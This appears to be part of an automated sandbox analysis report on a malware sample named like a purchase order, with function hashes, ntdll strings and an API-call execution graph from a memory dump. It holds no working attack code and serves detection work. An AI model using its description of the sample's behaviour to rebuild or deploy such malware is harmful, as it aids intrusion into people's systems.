                                                                                                        • Instruction ID: ff4b3cca795d54c19a22a690eee36f76a5c662edfb669b98fc8b8a2b911d6e87
                                                                                                        • Opcode Fuzzy Hash: 49fda1b7858ce07dd1fbb255b9020c4775feedd59c29656db7909a9ae9e9a312
                                                                                                        • Instruction Fuzzy Hash: C590023120590402D6007158880C747400597D0302F56C031A5164565EC665CA916632
                                                                                                        Function 01762F90 Relevance: .0, Instructions: 4COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 6204da92fa82b0035802633367e8b46a14f48500a1f50bf981dbcf7a093ec256
                                                                                                        • Instruction ID: ab7329b6292be6b87681da3e7e720df5087802b5c3885cf251b62602723777ae
                                                                                                        • Opcode Fuzzy Hash: 6204da92fa82b0035802633367e8b46a14f48500a1f50bf981dbcf7a093ec256
                                                                                                        • Instruction Fuzzy Hash: E190023120590402D6007158881870B400597D0302F56C031A1164565DC6258A516672
                                                                                                        Function 01762E30 Relevance: .0, Instructions: 4COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 3d15182fe1a3845ca610bf64d393bf6b558e3a83c63c3914921992c72eead119
                                                                                                        • Instruction ID: d353c2043eebf6997b8417e0390370371823f9ad361d6e811f05e4b82a04cdb3
                                                                                                        • Opcode Fuzzy Hash: 3d15182fe1a3845ca610bf64d393bf6b558e3a83c63c3914921992c72eead119
                                                                                                        • Instruction Fuzzy Hash: 5790022130550402D602715884186064009D7D1345F96C032E1424565DC6258B53A233
                                                                                                        Function 01762EE0 Relevance: .0, Instructions: 4COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: a93ab62af8e505f0104c5fb6a777dff61a822335fe0ea26b82b19fcc857590d7
                                                                                                        • Instruction ID: 82bd6962fb32a8bd1692ac26adcd46e509f36fbdec0e8e87e570926f84119f01
                                                                                                        • Opcode Fuzzy Hash: a93ab62af8e505f0104c5fb6a777dff61a822335fe0ea26b82b19fcc857590d7
                                                                                                        • Instruction Fuzzy Hash: FC90026120590403D64075588808607400597D0302F56C031A2064565ECA298E516236
                                                                                                        Function 01762EA0 Relevance: .0, Instructions: 4COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 1b7fcd046201922cf43e1b08bb6b76ab1ff58a24c1ac305742eadc8775b803f7
                                                                                                        • Instruction ID: 4f6c544e1c9f4bc262954f19114bef7eff21486d5d7452fdcdf01c255ff79276
                                                                                                        • Opcode Fuzzy Hash: 1b7fcd046201922cf43e1b08bb6b76ab1ff58a24c1ac305742eadc8775b803f7
                                                                                                        • Instruction Fuzzy Hash: FC90027120550402D64071588408746400597D0301F56C031A5064564EC6598FD56766
                                                                                                        Function 01762E80 Relevance: .0, Instructions: 4COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: f327775d835165a68c501467aafc09c4bff2b985fec5efcd8f83c71dc7a4038b
                                                                                                        • Instruction ID: 5cec2eb2de273af7ef5c1b27adcc5ecc8f5f9795cd3ef70429dc22916a63c392
                                                                                                        • Opcode Fuzzy Hash: f327775d835165a68c501467aafc09c4bff2b985fec5efcd8f83c71dc7a4038b
                                                                                                        • Instruction Fuzzy Hash: 3690022160550502D60171588408616400A97D0241F96C032A1024565ECA258B92A232
                                                                                                        Function 01763010 Relevance: .0, Instructions: 4COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 79c39eabc1282b725051ecd08b42df842b669d685c6d6b3e190f033157dbedfb
                                                                                                        • Instruction ID: a2341868aa12a411e605991a7913e10ae2fdffaa38001835c632a06c617d53aa
                                                                                                        • Opcode Fuzzy Hash: 79c39eabc1282b725051ecd08b42df842b669d685c6d6b3e190f033157dbedfb
                                                                                                        • Instruction Fuzzy Hash: 3890022120594442D64072588808B0F810597E1202F96C039A4156564CC9158A555722
                                                                                                        Function 01763090 Relevance: .0, Instructions: 4COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 9b3c102faf5e2b01819c93eabb7c94a518f708ddb4a01bdfd94ff61da44c7f88
                                                                                                        • Instruction ID: e96d7e270f179ab55a5510a91dfb645ae5ba3811d41f26684d2cda3b24fa81e0
                                                                                                        • Opcode Fuzzy Hash: 9b3c102faf5e2b01819c93eabb7c94a518f708ddb4a01bdfd94ff61da44c7f88
                                                                                                        • Instruction Fuzzy Hash: F890022124550802D6407158C4187074006D7D0601F56C031A0024564DC6168B6567B2
                                                                                                        Function 017639B0 Relevance: .0, Instructions: 4COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 1e5e8a6ffb5beccaf085e08fb4e9b2ec0f53e57d027d087d40fb9b1813f21c2b
                                                                                                        • Instruction ID: ea9e702fbc1a256cb2d72fdf1556f28a4baa4ea54ee583244b53cd6d087a9242
                                                                                                        • Opcode Fuzzy Hash: 1e5e8a6ffb5beccaf085e08fb4e9b2ec0f53e57d027d087d40fb9b1813f21c2b
                                                                                                        • Instruction Fuzzy Hash: 1F90022124955102D650715C84086168005B7E0201F56C031A08145A4DC5558A556322
                                                                                                        Function 01763D70 Relevance: .0, Instructions: 4COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 7df000a425f2a28584baa55b74dc7d4b7966c2629c521f3ed0b4ff16bdd25dad
                                                                                                        • Instruction ID: dd89340cb0f5596f32c6f382878338044ba0ede3612c73785ff05b0b4c4ac8d3
                                                                                                        • Opcode Fuzzy Hash: 7df000a425f2a28584baa55b74dc7d4b7966c2629c521f3ed0b4ff16bdd25dad
                                                                                                        • Instruction Fuzzy Hash: 8390023520550402DA1071589808646404697D0301F56D431A0424568DC6548AA1A222
                                                                                                        Function 01763D10 Relevance: .0, Instructions: 4COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 1a85e760d6c95d100b533167cfe17dcceef86e3e0146bc41c67937e0d497a8af
                                                                                                        • Instruction ID: 1359757081b8d6f89ee8978b24859fff7a0f614623e52348569b2cc399182689
                                                                                                        • Opcode Fuzzy Hash: 1a85e760d6c95d100b533167cfe17dcceef86e3e0146bc41c67937e0d497a8af
                                                                                                        • Instruction Fuzzy Hash: 51900231206501429A4072589808A4E810597E1302F96D435A0015564CC9148A615322
                                                                                                        Function 01762C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                        • Instruction ID: a6829e4c67f372c4345bb54c3a2bcf42fca153cb3710fa567e667a5536103ef7
                                                                                                        • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Function 01762890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ___swprintf_l
                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                        • API String ID: 48624451-2108815105
                                                                                                        • Opcode ID: 0254376a9836a6fc6d798ddbb9bfe2ce9649f23f404270ac800f6820e902fb0c
                                                                                                        • Instruction ID: b1c81f082015e3e1ff10aa9068d89fecfdd11b82b8a53be36107d0e4522771e2
                                                                                                        • Opcode Fuzzy Hash: 0254376a9836a6fc6d798ddbb9bfe2ce9649f23f404270ac800f6820e902fb0c
                                                                                                        • Instruction Fuzzy Hash: 7F51D5B1B00216AFDF51DB9C8C9097EFBBCBB48240B14C169E965D7646D734DE04CBA0
                                                                                                        Function 017D2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ___swprintf_l
                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                        • API String ID: 48624451-2108815105
                                                                                                        • Opcode ID: e434be150d1d5034ae9b426946a4487198b04ac5848658ae6d8fc0e594c479c2
                                                                                                        • Instruction ID: 2484f09295321102679f4ece7783770374025f08f51f0e7e7bec6b488a5b1c37
                                                                                                        • Opcode Fuzzy Hash: e434be150d1d5034ae9b426946a4487198b04ac5848658ae6d8fc0e594c479c2
                                                                                                        • Instruction Fuzzy Hash: D451F6B1A0064AAECB31DF5CC99097FFBF8EB44200B648899E997D7646E674DE018760
                                                                                                        Function 01757630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 017946FC
                                                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01794742
                                                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01794725
                                                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 01794787
                                                                                                        • Execute=1, xrefs: 01794713
                                                                                                        • ExecuteOptions, xrefs: 017946A0
                                                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01794655
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                        • API String ID: 0-484625025
                                                                                                        • Opcode ID: 1da4f8b72122beb2543e649d482df790e5d0dc61435ea2332d9126a198b55d87
                                                                                                        • Instruction ID: c36553e278c428ac8b2bdb3c7bf9d8ce048224f4f87d58cf864866e6b4ab8ef9
                                                                                                        • Opcode Fuzzy Hash: 1da4f8b72122beb2543e649d482df790e5d0dc61435ea2332d9126a198b55d87
                                                                                                        • Instruction Fuzzy Hash: 75511B71600219AAEF15AAA8EC99FADF7ACEF14304F8400D9EA05A71C1D7B0DA45CF61
                                                                                                        Function 0176B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __aulldvrm
                                                                                                        • String ID: +$-$0$0
                                                                                                        • API String ID: 1302938615-699404926
                                                                                                        • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                        • Instruction ID: fc667bba44a4044465d3398c88dc1083ffdf979374424fc90857a48f389340eb
                                                                                                        • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                        • Instruction Fuzzy Hash: CC81A070F4524A9EEF258E6CC8917FEFBB9AF46320F18415ADD51E7291C73898408B91
                                                                                                        Function 017D20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ___swprintf_l
                                                                                                        • String ID: %%%u$[$]:%u
                                                                                                        • API String ID: 48624451-2819853543
                                                                                                        • Opcode ID: 6c1e76bfc361b309b35f0d55fab752050962925252ed9f410fa94e8612ae5d7d
                                                                                                        • Instruction ID: 8c6c7795221a3f309ec49c41f5346410c9e0435daa3245c2ea01b1541b0e0358
                                                                                                        • Opcode Fuzzy Hash: 6c1e76bfc361b309b35f0d55fab752050962925252ed9f410fa94e8612ae5d7d
                                                                                                        • Instruction Fuzzy Hash: D921817AA0021DABDB11DE79CC44AAEFBF9AF54650F044116E915E3205E7319A028BA1
                                                                                                        Function 0174F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • RTL: Re-Waiting, xrefs: 0179031E
                                                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 017902E7
                                                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 017902BD
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                        • API String ID: 0-2474120054
                                                                                                        • Opcode ID: 184d412b8d9b2b05e641a933c2db52f6428320f2cace16b946ddacaf1f66c80a
                                                                                                        • Instruction ID: 0398d7809a5c936a496418bf9516e0741106963cf7f255da7569b1e117a08df3
                                                                                                        • Opcode Fuzzy Hash: 184d412b8d9b2b05e641a933c2db52f6428320f2cace16b946ddacaf1f66c80a
                                                                                                        • Instruction Fuzzy Hash: E6E1AB716187419FEB25CF2CD884B2AFBE4AB84314F140A5DF5A5CB2E1D774D948CB42
                                                                                                        Function 0175BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01797B7F
                                                                                                        • RTL: Re-Waiting, xrefs: 01797BAC
                                                                                                        • RTL: Resource at %p, xrefs: 01797B8E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                        • API String ID: 0-871070163
                                                                                                        • Opcode ID: b73db9e5875d0b868c59304b6010cef621bc701908d510ac43eea9d62b78625d
                                                                                                        • Instruction ID: 34376e181398082789d36b94b43678a357319e66b62b4c97609888c26fe7c05d
                                                                                                        • Opcode Fuzzy Hash: b73db9e5875d0b868c59304b6010cef621bc701908d510ac43eea9d62b78625d
                                                                                                        • Instruction Fuzzy Hash: 9B41D2317047029FDB25DE29D840B6AF7E6EF98710F100A1DFE5ADB680DBB1E9058B91
                                                                                                        Function 0175B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0179728C
                                                                                                        Strings
                                                                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01797294
                                                                                                        • RTL: Re-Waiting, xrefs: 017972C1
                                                                                                        • RTL: Resource at %p, xrefs: 017972A3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                        • API String ID: 885266447-605551621
                                                                                                        • Opcode ID: a0d34dd55dd3381ed20da8ad2ce97379d104de1433a61869d6e378bc15f0d536
                                                                                                        • Instruction ID: 41ccccec3631e508df0e5faae036b85c319b02d4541762d24077b5be8a1f0050
                                                                                                        • Opcode Fuzzy Hash: a0d34dd55dd3381ed20da8ad2ce97379d104de1433a61869d6e378bc15f0d536
                                                                                                        • Instruction Fuzzy Hash: 25411031614202ABCB25CE29DC81B6AFBA6FF94710F100658FD55AB280DB70E8068BD1
                                                                                                        Function 017D2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ___swprintf_l
                                                                                                        • String ID: %%%u$]:%u
                                                                                                        • API String ID: 48624451-3050659472
                                                                                                        • Opcode ID: 4b018c4e89ad893542348c7db9d3f304cbc189f5f7fb58baa2c8437803148803
                                                                                                        • Instruction ID: 1239a3370454f295d773961046354361464e60780b7f443ad738a404e22f19d9
                                                                                                        • Opcode Fuzzy Hash: 4b018c4e89ad893542348c7db9d3f304cbc189f5f7fb58baa2c8437803148803
                                                                                                        • Instruction Fuzzy Hash: F0314172A00219AFDB20DF2DCC44BAEF7B8AB54610F54455AED49E3245EF30AA458BA0
                                                                                                        Function 01767D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __aulldvrm
                                                                                                        • String ID: +$-
                                                                                                        • API String ID: 1302938615-2137968064
                                                                                                        • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                        • Instruction ID: 42db155ea4b44b7f28b8b00fa33eb8e18384742468fcba5fd978021afddd3ca8
                                                                                                        • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                        • Instruction Fuzzy Hash: B491D671E002069BEF28CF6DC881AFEFBA9EF447A8F54451AED55E72C4D73489818B11
                                                                                                        Function 01729126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $$@
                                                                                                        • API String ID: 0-1194432280
                                                                                                        • Opcode ID: 6e7c940d83f2fccf37da5863615b81d3e7fbc7cab1c585d867ee54c6da86aba5
                                                                                                        • Instruction ID: b9d07e1727f254928b0668f64349f3f947d95071648d9182a0a8e9088cb2ec01
                                                                                                        • Opcode Fuzzy Hash: 6e7c940d83f2fccf37da5863615b81d3e7fbc7cab1c585d867ee54c6da86aba5
                                                                                                        • Instruction Fuzzy Hash: CD812A71D402799BDB319B54CC44BEAF7B8AF48714F1441EAEA09B7241E7709E85CFA0

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:2.6%
                                                                                                        Dynamic/Decrypted Code Coverage:4.1%
                                                                                                        Signature Coverage:1.5%
                                                                                                        Total number of Nodes:461
                                                                                                        Total number of Limit Nodes:77
                                                                                                        execution_graph 98384 1d1391 98396 1d9200 98384->98396 98386 1d13b2 98387 1d13e5 98386->98387 98388 1d13d0 98386->98388 98400 1d9390 98387->98400 98389 1d9390 NtClose 98388->98389 98391 1d13d9 98389->98391 98392 1d1425 98393 1d13ee 98393->98392 98403 1db3d0 98393->98403 98397 1d92a7 98396->98397 98399 1d922b 98396->98399 98398 1d92ba NtReadFile 98397->98398 98398->98386 98399->98386 98401 1d93aa 98400->98401 98402 1d93b8 NtClose 98401->98402 98402->98393 98406 1d96f0 98403->98406 98405 1d1419 98407 1d970a 98406->98407 98408 1d9718 RtlFreeHeap 98407->98408 98408->98405 98794 1cae50 98799 1cab60 98794->98799 98796 1cae5d 98815 1ca7e0 98796->98815 98798 1cae79 98800 1cab85 98799->98800 98827 1c8490 98800->98827 98803 1cacd0 98803->98796 98805 1cace7 98805->98796 98806 1cacde 98806->98805 98808 1cadd5 98806->98808 98846 1d4ee0 98806->98846 98851 1ca230 98806->98851 98810 1d4ee0 GetFileAttributesW 98808->98810 98812 1cae3a 98808->98812 98860 1ca5a0 98808->98860 98810->98808 98813 1db3d0 RtlFreeHeap 98812->98813 98814 1cae41 98813->98814 98814->98796 98816 1ca7f6 98815->98816 98819 1ca801 98815->98819 98817 1db4b0 RtlAllocateHeap 98816->98817 98817->98819 98818 1ca822 98818->98798 98819->98818 98820 1c8490 GetFileAttributesW 98819->98820 98821 1cab35 98819->98821 98824 1d4ee0 GetFileAttributesW 98819->98824 98825 1ca230 RtlFreeHeap 98819->98825 98826 1ca5a0 RtlFreeHeap 98819->98826 98820->98819 98822 1cab4e 98821->98822 98823 1db3d0 RtlFreeHeap 98821->98823 98822->98798 98823->98822 98824->98819 98825->98819 98826->98819 98828 1c84af 98827->98828 98829 1c84b6 GetFileAttributesW 98828->98829 98830 1c84c1 98828->98830 98829->98830 98830->98803 98831 1d3410 98830->98831 98832 1d341e 98831->98832 98833 1d3425 98831->98833 98832->98806 98834 1c4700 LdrLoadDll 98833->98834 98835 1d3457 98834->98835 98836 1d3466 98835->98836 98864 1d2ee0 LdrLoadDll 98835->98864 98838 1db4b0 RtlAllocateHeap 98836->98838 98842 1d3614 98836->98842 98839 1d347f 98838->98839 98840 1d360a 98839->98840 98839->98842 98844 1d349b 98839->98844 98841 1db3d0 RtlFreeHeap 98840->98841 98840->98842 98841->98842 98842->98806 98843 1db3d0 RtlFreeHeap 98845 1d35fe 98843->98845 98844->98842 98844->98843 98845->98806 98847 1d4f44 98846->98847 98848 1d4f7b 98847->98848 98865 1c84d0 98847->98865 98848->98806 98850 1d4f5d 98850->98806 98852 1ca256 98851->98852 98869 1cdc70 98852->98869 98854 1ca2c8 98855 1ca2e6 98854->98855 98857 1ca44a 98854->98857 98856 1ca42f 98855->98856 98874 1ca0f0 98855->98874 98856->98806 98857->98856 98859 1ca0f0 RtlFreeHeap 98857->98859 98859->98857 98861 1ca5c6 98860->98861 98862 1cdc70 RtlFreeHeap 98861->98862 98863 1ca64d 98862->98863 98863->98808 98864->98836 98866 1c84c1 98865->98866 98867 1c84b3 GetFileAttributesW 98865->98867 98866->98850 98867->98866 98871 1cdc94 98869->98871 98870 1cdca1 98870->98854 98871->98870 98872 1db3d0 RtlFreeHeap 98871->98872 98873 1cdcde 98872->98873 98873->98854 98875 1ca10d 98874->98875 98878 1cdcf0 98875->98878 98877 1ca213 98877->98855 98879 1cdd14 98878->98879 98880 1cddbe 98879->98880 98881 1db3d0 RtlFreeHeap 98879->98881 98880->98877 98881->98880 98409 1d1b90 98413 1d1ba9 98409->98413 98410 1d1c3c 98411 1d1bf4 98412 1db3d0 RtlFreeHeap 98411->98412 98414 1d1c04 98412->98414 98413->98410 98413->98411 98415 1d1c37 98413->98415 98416 1db3d0 RtlFreeHeap 98415->98416 98416->98410 98882 